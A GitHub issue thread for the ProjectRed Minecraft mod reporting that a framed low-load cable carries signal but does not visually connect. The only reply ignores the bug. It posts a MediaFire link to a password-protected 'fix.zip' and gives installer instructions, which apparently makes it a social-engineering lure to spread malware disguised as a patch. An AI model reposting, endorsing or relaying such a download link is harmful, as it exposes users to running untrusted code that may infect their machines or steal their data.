### ISSUE TITLE
[Bug] this cable does not automatically connect together, but does conduct bluestone energy.

### ISSUE THREAD

**Issue by Luolwh** [MrTJP/ProjectRed#1891]
### Minecraft version

1.20.x

### CodeChickenLib version

1.20.1-4.4.0.512-universal

### CBMultipart version

1.20.1-3.3.0.146-universal

### ProjectRed version

1.20.1-4.19.0-transmission

### What happened?

![2024-08-29_10 53 39](https://github.com/user-attachments/assets/ac61be59-14a2-4c79-8027-189140c5b403)
In version 1.20.1, I found that this framed low load power line does not automatically connect together, but does conduct bluestone energy.

### Crash log

no log.

### How do you make it happen again?

I simply placed this cable and found the issue, but other cables do not have this problem.

**Comment by Kudjo-Grand** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."
